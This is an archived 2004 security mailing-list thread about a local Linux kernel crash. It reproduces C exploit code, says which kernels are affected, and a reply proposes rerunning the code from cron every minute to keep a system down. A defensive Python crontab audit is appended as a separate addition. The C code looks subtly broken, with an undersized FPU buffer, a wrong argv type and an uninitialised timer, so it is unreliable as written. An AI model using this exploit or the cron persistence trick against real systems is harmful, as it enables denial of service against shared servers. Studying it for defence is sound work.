[VulnDiscuss] RE: [VulnWatch] Kernel Exploit?
From: Hamlesh Motah (adminhamlesh.com)
Date: Wed Jun 16 2004 - 02:37:54 CDT
This worked on one of my local test bed machines, Linux version 2.4.22.
This particularly made me laugh;
"If your system is a production server with 1000 on line users then do
not test this code on that box."
A user with shell access, and access to cron could set up a job that runs
every minute to execute this, taking the system down almost as soon as
it comes back up. You wouldn't really be able to tell what the heck was
tel: +44 (0)709 212 0732
fax: +44 (0)709 212 0732
Hamlesh Consultants - IT Consultancy - Total Solutions Provider.
: -----Original Message-----
: From: JM [mailto:jeromegmanmi.tv]
: Sent: 15 June 2004 05:22
: To: vulnwatchvulnwatch.org
: Subject: [VulnWatch] Kernel Exploit?
: I'm wondering if this is true... tried it in one of my LAN boxes but it
: seems it didn't work...
: New Kernel Crash-Exploit discovered
: A bug lets a simple C program crash the kernel, effectively locking the
: whole system. Affects both 2.4.2x and 2.6.x kernels on the x86
: architecture.
: The Evil Code
: Running this simple C program crashes the Linux kernel.
: #include <sys/time.h>
: #include <signal.h>
: #include <unistd.h>
:
: static void Handler(int ignore)
: {
:     char fpubuf;
:     __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
:     write(2, "*", 1);
:     __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
: }
:
: int main(int argc, char *argv)
: {
:     struct itimerval spec;
:     signal(SIGALRM, Handler);
:     setitimer(ITIMER_REAL, &spec, NULL);
:     write(1, ".", 1);
:     return 0;
: }
: This bug is confirmed to be present when the code is compiled with GCC
: version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
: versions 2.4.2x and 2.6.x on x86 and amd64 systems.
: The threat
: Using this exploit to crash Linux systems requires the (ab)user to have
: shell access or other means of uploading and running the program (like
: cgi-bin and FTP access). The program works on any normal user
: root access is not required. This exploit has been reported used to take
: down several "lame free-shell providers" servers (running code you know
: will damage a system intentionally and hacking in general is illegal in
: most parts of the world and strongly discouraged).
: This code only works on x86 Linux machines. This code does not compile
: (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird).
: This doesn't affect NetBSD Stable.
: SMP systems can be compromised, but a separate instance of the program
: is required for each CPU before the system halts. Each instance of the
: program code will lock one CPU and this process can not be killed. If
: you have two CPUs the second instance of the program kills the entire
: Check your own system yourself if you are wondering if this affects you.
: Better safe than sorry. Assume it will crash, sync (even unmount) your
: file systems before testing. If your system is a production server with
: 1000 on line users then do not test this code on that box.
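
Added example, not part of either message in this thread: a sketch of an audit for the cron scenario raised in the reply, flagging per-user crontab entries that run every minute or at boot from a user-writable location. The sample crontabs, user names, paths and the writable-prefix list are constructed assumptions; on a real host the input would be read from the system's crontab spool.

```python
import re

# Constructed sample: per-user crontab text (users, paths and jobs are made up).
SAMPLE_CRONTABS = {
    "alice": "# backups\n30 2 * * * /home/alice/bin/backup.sh\n",
    "bob": 'MAILTO=""\n* * * * * /tmp/.x/a.out >/dev/null 2>&1\n'
           "@reboot /home/bob/a.out\n",
    "carol": "*/1 * * * * $HOME/run\n*/15 * * * * /usr/bin/fetchmail\n",
}

# Assumption: locations an unprivileged user can normally write to.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "$HOME/", "~/")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # e.g. MAILTO=""


def every_minute(field):
    """True if a crontab minute field fires on every minute."""
    return field in ("*", "*/1", "0-59", "0-59/1")


def audit_crontab(user, text):
    """Return (user, line number, reason, program) for each suspicious job."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue  # blank line, comment or environment setting
        if line.startswith("@"):
            parts = line.split(None, 1)
            cmd = parts[1] if len(parts) > 1 else ""
            flagged, reason = parts[0] == "@reboot", "runs at boot"
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry, nothing to schedule
            cmd = parts[5]
            flagged = every_minute(parts[0]) and all(f == "*" for f in parts[1:5])
            reason = "runs every minute"
        if flagged and cmd.startswith(WRITABLE_PREFIXES):
            findings.append((user, lineno, reason, cmd.split()[0]))
    return findings


def audit_all(crontabs):
    """Audit every user's crontab, in user-name order."""
    results = []
    for user in sorted(crontabs):
        results.extend(audit_crontab(user, crontabs[user]))
    return results


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_CRONTABS):
        print("%s line %d: %s: %s" % finding)
```
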